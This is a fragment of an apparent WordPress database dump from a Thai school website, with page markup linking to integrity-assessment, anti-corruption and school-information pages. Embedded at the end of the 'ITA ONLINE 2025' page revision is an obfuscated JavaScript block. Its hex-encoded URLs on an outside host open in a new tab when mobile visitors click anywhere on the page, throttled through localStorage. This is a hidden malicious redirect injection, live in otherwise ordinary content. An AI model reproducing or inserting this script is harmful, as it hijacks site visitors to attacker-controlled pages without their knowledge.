href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 14:38:52','2025-07-01 07:38:52','',871,'http://pakhaeng.ssk.in.th/?p=1575',0,'revision','',0),
(1577,1,'2025-07-01 14:42:39','2025-07-01 07:42:39','','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:42:39','2025-07-01 07:42:39','',1571,'http://pakhaeng.ssk.in.th/?p=1577',0,'revision','',0),
(1578,1,'2025-07-01 14:42:40','2025-07-01 07:42:40','','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:42:40','2025-07-01 07:42:40','',1571,'http://pakhaeng.ssk.in.th/?p=1578',0,'revision','',0),
(1579,1,'2025-07-01 14:42:40','2025-07-01 07:42:40','','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:42:40','2025-07-01 07:42:40','',1571,'http://pakhaeng.ssk.in.th/?p=1579',0,'revision','',0),
(1580,1,'2025-07-01 14:42:54','2025-07-01 07:42:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 